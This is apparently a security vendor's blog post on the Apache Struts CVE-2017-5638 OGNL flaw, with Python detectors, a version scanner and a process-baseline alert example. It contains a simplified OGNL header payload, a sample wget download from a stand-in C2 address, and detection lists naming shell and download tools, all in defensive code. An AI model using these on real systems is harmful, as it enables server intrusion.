New vulnerabilities are discovered on a regular basis. Some receive quite a bit of publicity, while others fly under the radar, and the latter give attackers a long window in which to exploit systems that nobody got around to patching.
A good example of one that has been “out” for quite a while without receiving much attention in the media (and thus from organizations that may be affected) is the Apache Struts vulnerability. Today, we’d like to take a look at what it is, why it’s worthy of attention, and what you can do to protect your organization.
The Apache Struts Vulnerability: What it is and Why it Matters
"Apache" here is the Apache Software Foundation, which maintains, among many other projects, the Apache HTTP Server, the most widely deployed web server in the world. Struts is a separate Apache project: an open source framework for building Java web applications, which runs inside a Java servlet container such as Apache Tomcat rather than inside the HTTP Server. It's quite popular with large tech companies, government agencies, and financial institutions.
In March 2017 a serious vulnerability in Apache Struts 2 was disclosed (tracked as CVE-2017-5638, Apache advisory S2-045), and it has been actively exploited in the wild ever since. The flaw resides in the Jakarta Multipart parser that Struts uses for file uploads: when the parser rejects a malformed upload request, it builds an error message from the request's Content-Type header and passes that message through Struts' OGNL expression evaluator. An attacker who puts an OGNL expression in the Content-Type header therefore gets it evaluated, and with it arbitrary command execution, on the server hosting the application. This is unauthenticated remote code execution on the server, not on end users' systems.
Because Struts is such a widespread technology, the vulnerability has the potential to impact many organizations, and the potential fallout is dire: the attacker's commands run with the privileges of the application server process. The attacks are even more severe for organizations running their Java application server (Tomcat or similar) as root, which is not a best practice.
This vulnerability is also extra concerning because exploiting it is trivial. Attackers can easily spot vulnerable systems (Struts applications are recognizable by their .action and .do URLs), working Struts exploits are publicly available, and the attack is easy to carry out and repeat. A single crafted HTTP header is enough to make the server download and run a malicious binary from the internet, and no authentication is required.
The ubiquity of Struts, combined with the simplicity of executing this attack, makes it one worth paying attention to and actively protecting against.
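Because the attack rides entirely on one request header, it is straightforward to recognize at a reverse proxy, WAF, or packet capture. The following is an added example (not part of the original post and not Threat Stack's code) that parses raw HTTP requests and flags multipart headers carrying OGNL expression syntax. The two sample requests are constructed for the example; the "exploit" one is a simplified illustration of the payload shape, not a working exploit. It also watches Content-Disposition, which the follow-up S2-046 variant of the same parser bug abuses.

```python
import re

# Syntax an OGNL expression needs in order to be evaluated on the Jakarta
# Multipart parser's error path: "%{...}" (or "${...}"). A legitimate
# Content-Type value never contains this.
OGNL_EXPR = re.compile(r"[%$]\{")

# Fragments the public CVE-2017-5638 exploits use to disable the OGNL sandbox
# and spawn a process. Useful for triage; the "%{" check alone is the signal.
OGNL_HINTS = (
    "#_memberAccess",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "java.lang.ProcessBuilder",
    "getRuntime",
    "#cmd",
)

# Headers the vulnerable parser evaluates: Content-Type (S2-045) and, in the
# follow-up S2-046 variant of the same bug, Content-Disposition of a part.
WATCHED_HEADERS = ("content-type", "content-disposition")


def parse_request_headers(raw_request):
    """Return the header block of a raw HTTP request as a {lower-name: value} dict."""
    lines = raw_request.splitlines()
    headers = {}
    for line in lines[1:]:          # skip the request line
        if line.strip() == "":      # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def classify_request(raw_request):
    """Flag a request whose multipart headers carry an OGNL expression."""
    headers = parse_request_headers(raw_request)
    findings = []
    for name in WATCHED_HEADERS:
        value = headers.get(name, "")
        if OGNL_EXPR.search(value):
            hints = [h for h in OGNL_HINTS if h in value]
            findings.append((name, hints))
    return {"suspicious": bool(findings), "findings": findings}


# Constructed sample requests (not real captures).
BENIGN_REQUEST = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: app.example.internal\r\n"
    "Content-Type: multipart/form-data; boundary=----Boundary7MA4YWxk\r\n"
    "Content-Length: 1234\r\n"
    "\r\n"
)

# Simplified illustration of the S2-045 payload shape (not a working exploit).
EXPLOIT_REQUEST = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: app.example.internal\r\n"
    "Content-Type: %{(#_='multipart/form-data')."
    "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#cmd='id').(#p=new java.lang.ProcessBuilder(#cmd)).(#p.start())}\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, request in (("benign", BENIGN_REQUEST), ("exploit", EXPLOIT_REQUEST)):
        print(label, classify_request(request))
```

Note that a signature like this tells you an attempt was made, not whether it succeeded; confirming success is what host-level monitoring (below) is for. Attackers can also vary the payload freely, so treat the `%{` test as the durable part and the hint list as triage help only.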
How to Protect Against the Apache Struts Vulnerability
As far as this specific vulnerability is concerned, the Struts versions affected (per the Apache S2-045 advisory) are 2.3.5 through 2.3.31 and 2.5 through 2.5.10.
Anyone running an affected version should immediately upgrade to 2.3.32 or 2.5.10.1, the first fixed releases in each branch. Alternatively, as the advisory notes, you can switch the application to a different implementation of the multipart parser.
However, patching isn't always as straightforward as it sounds. Struts is a library bundled inside each application's WAR file, not a package on the host, so every affected web app has to be rebuilt against the fixed version and redeployed. Older apps whose build pipelines nobody maintains any more might even have to be brought back from the dead for the purpose, so that they aren't left as a weak point for attackers.
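Because the fix is per-application, the first job is finding every copy of Struts on your hosts. The following is an added example, not from the original post or from Threat Stack, that checks `struts2-core` jar file names against the affected ranges from the S2-045 advisory. The sample inventory is constructed; `scan_directory` is what you would point at a real Tomcat `webapps` tree.

```python
import re
from pathlib import Path

# Per the Apache S2-045 advisory: Struts 2.3.5 through 2.3.31 and 2.5 through
# 2.5.10 are affected; 2.3.32 and 2.5.10.1 are the first fixed releases.
AFFECTED_RANGES = (
    ((2, 3, 5), (2, 3, 32)),      # [2.3.5, 2.3.32)
    ((2, 5), (2, 5, 10, 1)),      # [2.5, 2.5.10.1)
)

JAR_NAME = re.compile(r"^struts2-core-(\d+(?:\.\d+)+)\.jar$")


def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1); tuples compare element-wise, as versions do."""
    return tuple(int(part) for part in text.split("."))


def is_vulnerable(version):
    """True if the given struts2-core version falls in an affected range."""
    v = parse_version(version)
    return any(low <= v < high for low, high in AFFECTED_RANGES)


def check_jar_path(path):
    """Return (version, vulnerable) for a struts2-core jar path, or None if not one."""
    m = JAR_NAME.match(Path(path).name)
    if not m:
        return None
    version = m.group(1)
    return version, is_vulnerable(version)


def scan_paths(paths):
    """Report (path, version, vulnerable) for every struts2-core jar in paths."""
    report = []
    for p in paths:
        result = check_jar_path(p)
        if result is not None:
            report.append((str(p), result[0], result[1]))
    return report


def scan_directory(root):
    """Walk a real filesystem tree (e.g. Tomcat's webapps) for struts2-core jars."""
    return scan_paths(sorted(str(p) for p in Path(root).rglob("struts2-core-*.jar")))


# Constructed inventory, standing in for the output of a filesystem walk.
SAMPLE_PATHS = [
    "/opt/tomcat/webapps/portal/WEB-INF/lib/struts2-core-2.3.31.jar",
    "/opt/tomcat/webapps/legacy/WEB-INF/lib/struts2-core-2.3.4.jar",
    "/opt/tomcat/webapps/api/WEB-INF/lib/struts2-core-2.5.10.jar",
    "/opt/tomcat/webapps/api/WEB-INF/lib/struts2-core-2.5.10.1.jar",
    "/opt/tomcat/webapps/api/WEB-INF/lib/commons-fileupload-1.3.2.jar",
]

if __name__ == "__main__":
    for path, version, vulnerable in scan_paths(SAMPLE_PATHS):
        print(("VULNERABLE " if vulnerable else "ok         ") + version + "  " + path)
```

Two caveats: this is a file-name check, so it misses Struts copies that were repackaged into an uber-jar or renamed, and it cannot tell whether an application has already been switched away from the Jakarta parser. Treat a clean result as "nothing found" rather than "not vulnerable", and follow up with a real exploit-attempt test in staging if you can.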
It's a good idea to get those patches done as quickly as you can, but patching quickly is not always easy or possible, especially for critical or public-facing servers. Because of this, having a real-time host-based intrusion detection system (HIDS) is important: it lets you detect these attacks whether the flaw is still a zero-day or a long-published one you haven't been able to patch yet.
Why HIDS is a Key Line of Defense
Even if you are not vulnerable to this particular attack, it's a good idea to use it as an excuse to evaluate your intrusion detection capabilities. Every organization needs a real-time intrusion detection platform in place, because more vulnerabilities like this one, and the attacks that follow them, are certain to appear in the future.
The primary value of host-based intrusion detection monitoring is that it lets you use behavior-based indicators to catch suspicious events immediately, regardless of which vulnerability got the attacker in. With a solution like the Threat Stack Cloud Security Platform®, out-of-the-box rulesets will alert you to common security events, like abnormal (or any) commands run by your application server's service user (for example, the tomcat account spawning a shell, curl, or wget), unexpected system modifications, or anomalous connections to known command and control servers.
Baselining your system will give you a clear sense of what is "normal" for your environment, and then HIDS can be put to work catching anomalies in real time when they arise, not days or even hours later, after they've already had a chance to wreak havoc.
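To make the baseline-then-detect idea concrete, here is an added example (not Threat Stack's rules or code) that learns which executables the app server account runs during a known-good window and then alerts on anything outside that set, escalating for shells and download tools, with a known-C2 check on outbound connections. The event shape, the user names, and the C2 address (a TEST-NET-3 documentation address) are all constructed for the example.

```python
from dataclasses import dataclass


@dataclass
class HostEvent:
    """One host-level event as a HIDS agent would report it (constructed shape)."""
    kind: str            # "exec" (process start) or "connect" (outbound TCP)
    user: str            # account the process runs as
    exe: str = ""        # executable path, for exec events
    args: str = ""       # command line, for exec events
    parent: str = ""     # parent executable, for exec events
    dst: str = ""        # destination IP, for connect events


# Accounts a Java app server runs as. Exploiting the Struts flaw yields code
# execution as exactly this user, so its behaviour is what we baseline.
SERVICE_USERS = {"tomcat", "www-data"}

# Tools a web app process has no business launching; these escalate severity.
HIGH_RISK_EXES = {"/bin/sh", "/bin/bash", "/usr/bin/curl", "/usr/bin/wget",
                  "/usr/bin/python", "/usr/bin/perl", "/usr/bin/nc"}

# Constructed threat-intel entry (TEST-NET-3 address, not a real C2 server).
KNOWN_C2 = {"203.0.113.45"}


def build_baseline(events):
    """Learn, per service user, the set of executables seen during a known-good window."""
    baseline = {}
    for e in events:
        if e.kind == "exec" and e.user in SERVICE_USERS:
            baseline.setdefault(e.user, set()).add(e.exe)
    return baseline


def detect(events, baseline):
    """Return (severity, message) alerts for events that deviate from the baseline."""
    alerts = []
    for e in events:
        if e.kind == "exec" and e.user in SERVICE_USERS:
            if e.exe not in baseline.get(e.user, set()):
                severity = "high" if e.exe in HIGH_RISK_EXES else "medium"
                alerts.append((severity,
                               f"{e.user} ran unexpected {e.exe} {e.args} (parent {e.parent})"))
        elif e.kind == "connect" and e.dst in KNOWN_C2:
            alerts.append(("critical", f"{e.user} connected to known C2 host {e.dst}"))
    return alerts


# Constructed learning window: the app server just runs Java and talks to its DB.
BASELINE_EVENTS = [
    HostEvent("exec", "tomcat", exe="/usr/bin/java",
              args="org.apache.catalina.startup.Bootstrap start", parent="/bin/systemd"),
    HostEvent("connect", "tomcat", dst="10.0.0.5"),
]

# Constructed live window: a post-exploitation chain after a Struts RCE,
# plus unrelated root activity that should not alert.
LIVE_EVENTS = [
    HostEvent("exec", "tomcat", exe="/usr/bin/java",
              args="org.apache.catalina.startup.Bootstrap start", parent="/bin/systemd"),
    HostEvent("exec", "tomcat", exe="/bin/sh",
              args="-c 'wget http://203.0.113.45/x -O /tmp/x'", parent="/usr/bin/java"),
    HostEvent("exec", "tomcat", exe="/usr/bin/wget",
              args="http://203.0.113.45/x -O /tmp/x", parent="/bin/sh"),
    HostEvent("connect", "tomcat", dst="203.0.113.45"),
    HostEvent("exec", "root", exe="/usr/sbin/cron", parent="/bin/systemd"),
]

if __name__ == "__main__":
    for severity, message in detect(LIVE_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(f"[{severity}] {message}")
```

The point worth noticing is that none of the three alerts depends on knowing anything about Struts or OGNL: a Java process that suddenly spawns `/bin/sh` and `wget` is suspicious no matter which bug made it happen. The trade-off is that the baseline must be learned from a window you trust to be clean, and it has to be re-learned when legitimate deployments change what the service user runs.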
If you have Threat Stack installed, you still need to patch, but you don't have to wait for a patch (or for a vendor advisory) to find out whether the Struts vulnerability, or a similar one still in its zero-day state, is being used against you. The Threat Stack platform will alert you if there is unexpected activity in your environment, so you can respond quickly and effectively.
Final Words . . .
While the Struts vulnerability was somewhat surprising in how widespread it was and how little media attention it received, it's safe to say that there are plenty more like it lurking in the wings, ready to make their debut, or maybe already being exploited.
Patching systems that can be patched and putting in place a robust HIDS capability will allow you to go about your business without worrying that the next Heartbleed or Shellshock or Apache Struts vulnerability will torpedo your organization.